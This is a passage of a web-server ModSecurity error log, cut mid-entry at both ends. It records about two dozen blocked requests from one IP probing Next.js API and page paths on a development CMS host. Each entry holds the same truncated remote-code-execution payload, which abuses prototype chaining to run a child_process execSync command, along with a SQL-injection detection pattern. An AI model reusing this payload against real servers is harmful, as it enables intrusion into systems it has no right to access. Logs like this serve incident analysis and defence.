21899] [client 172.94.9.249:47514] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/action"] [unique_id "aaZAcNsyBa6FPxjfniwsdwAAAEU"] [Tue Mar 03 03:59:12.343955 2026] [:error] [pid 21979:tid 21985] [client 172.94.9.249:47502] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth/session"] [unique_id "aaZAcP2xhCLtpShpTOoylgAAAMQ"] [Tue Mar 03 03:59:12.343955 2026] [:error] [pid 21862:tid 21925] [client 172.94.9.249:47526] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/trpc"] [unique_id "aaZAcPh_lrWoDSo4I3RnvgAAAI8"] [Tue Mar 03 03:59:12.344457 2026] [:error] [pid 21979:tid 21989] [client 172.94.9.249:47512] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/api"] [unique_id "aaZAcP2xhCLtpShpTOoylQAAAMg"] [Tue Mar 03 03:59:12.344494 2026] [:error] [pid 21979:tid 21997] [client 172.94.9.249:47572] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth"] [unique_id "aaZAcP2xhCLtpShpTOoylAAAANA"] [Tue Mar 03 03:59:12.375953 2026] [:error] [pid 21979:tid 21991] [client 172.94.9.249:47502] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/revalidate"] [unique_id "aaZAcP2xhCLtpShpTOoylwAAAMo"] [Tue Mar 03 03:59:12.375958 2026] [:error] [pid 21979:tid 21995] [client 172.94.9.249:47512] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/_next/data"] [unique_id "aaZAcP2xhCLtpShpTOoymAAAAM4"] [Tue Mar 03 03:59:12.376017 2026] [:error] [pid 21862:tid 21939] [client 172.94.9.249:47526] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/faq"] [unique_id "aaZAcPh_lrWoDSo4I3RnvwAAAJU"] [Tue Mar 03 03:59:12.376164 2026] [:error] [pid 21979:tid 22001] [client 172.94.9.249:47572] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/v1"] [unique_id "aaZAcP2xhCLtpShpTOoymQAAANQ"] [Tue Mar 03 03:59:12.376834 2026] [:error] [pid 21862:tid 21930] [client 172.94.9.249:47562] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/og"] [unique_id "aaZAcPh_lrWoDSo4I3RnwAAAAJE"] [Tue Mar 03 03:59:12.376930 2026] [:error] [pid 21862:tid 21939] [client 172.94.9.249:47508] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/v3"] [unique_id "aaZAcPh_lrWoDSo4I3RnwQAAAJU"] [Tue Mar 03 03:59:12.376946 2026] [:error] [pid 21979:tid 21992] [client 172.94.9.249:47536] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/v2"] [unique_id "aaZAcP2xhCLtpShpTOoymgAAAMs"] [Tue Mar 03 03:59:12.376971 2026] [:error] [pid 21979:tid 21988] [client 172.94.9.249:47546] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/_next/image"] [unique_id "aaZAcP2xhCLtpShpTOoymwAAAMc"] [Tue Mar 03 03:59:12.377566 2026] [:error] [pid 21861:tid 21901] [client 172.94.9.249:47514] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/sitemap"] [unique_id "aaZAcNsyBa6FPxjfniwseAAAAEY"] [Tue Mar 03 03:59:12.407217 2026] [:error] [pid 21979:tid 22002] [client 172.94.9.249:47572] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/users"] [unique_id "aaZAcP2xhCLtpShpTOoynQAAANU"] [Tue Mar 03 03:59:12.407244 2026] [:error] [pid 21862:tid 21896] [client 172.94.9.249:47508] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/auth/signin"] [unique_id "aaZAcPh_lrWoDSo4I3RnwgAAAIA"] [Tue Mar 03 03:59:12.407446 2026] [:error] [pid 21979:tid 21987] [client 172.94.9.249:47502] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/api/user"] [unique_id "aaZAcP2xhCLtpShpTOoyngAAAMY"] [Tue Mar 03 03:59:12.407751 2026] [:error] [pid 21979:tid 21994] [client 172.94.9.249:47546] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/en"] [unique_id "aaZAcP2xhCLtpShpTOoynwAAAM0"] [Tue Mar 03 03:59:12.408269 2026] [:error] [pid 21979:tid 21996] [client 172.94.9.249:47536] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((44128*44488))',{'timeout':60000,'maxBuffer':52428800}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`${res}`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/es"] [unique_id "aaZAcP2xhCLtpShpTOoyoAAAAM8"] [Tue Mar 03 03:59:12.408410 2026] [:error] [pid 21861:tid 21903] [client 172.94.9.249:47514] [client 172.94.9.249] ModSecurity: Access denied with code 403 (phase 2). Pattern match 